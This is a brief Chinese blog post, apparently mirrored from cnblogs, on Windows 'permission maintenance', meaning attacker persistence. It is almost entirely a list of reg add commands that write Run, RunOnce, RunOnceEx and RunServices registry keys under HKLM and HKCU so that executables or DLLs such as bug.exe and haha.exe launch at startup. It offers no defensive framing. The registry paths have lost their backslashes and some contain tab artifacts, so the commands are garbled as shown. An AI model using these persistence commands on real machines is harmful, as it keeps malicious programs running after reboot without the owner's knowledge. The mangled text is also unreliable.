zoukankan      html  css  js  c++  java
  • windows权限维持之注册表

    适用于dll或者自启动
    reg add "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRunOnceEx001" /v bug /t REG_SZ /d "C:ugug.exe" 
    reg add "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRunOnceEx001Depend" /v bug /t REG_SZ /d "C:ugug.dll"
    
    reg add "HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun" /v bug /t REG_SZ /d "C:Users	estDownloadsug.exe"
    reg add "HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRunOnce" /v bug /t REG_SZ /d "C:Users	estDownloadsug.exe"
    reg add "HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRunServices" /v bug /t REG_SZ /d "C:Users	estDownloadsug.exe"
    reg add "HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRunServicesOnce" /v bug /t REG_SZ /d "C:Users	estDownloadsug.exe"
    
    reg add "HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun" /v yang /t REG_SZ /d "C:programdatahaha.exe"
    reg add "HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRunOnce" /v yang /t REG_SZ /d "C:programdatahaha.exe"
    reg add "HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRunServices" /v yang /t REG_SZ /d "C:programdatahaha.exe"
    reg add "HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRunServicesOnce" /v yang /t REG_SZ /d "C:programdatahaha.exe"
    
    案例

  • 相关阅读:
    YARN分析系列之三 -- 从脚本入口分析 ResourceManager的初始化过程
    YARN分析系列之二 -- Hadoop YARN各个自模块说明
    MacOS平台上编译 hadoop 3.1.2 源码
    YARN分析系列之一 -- 总览YARN组件
    WCF入门 (14)
    WCF入门 (13)
    WCF入门(12)
    WCF入门(11)
    WCF入门(10)
    WCF入门(9)
  • 原文地址:https://www.cnblogs.com/Yang34/p/14186904.html
Copyright © 2011-2022 走看看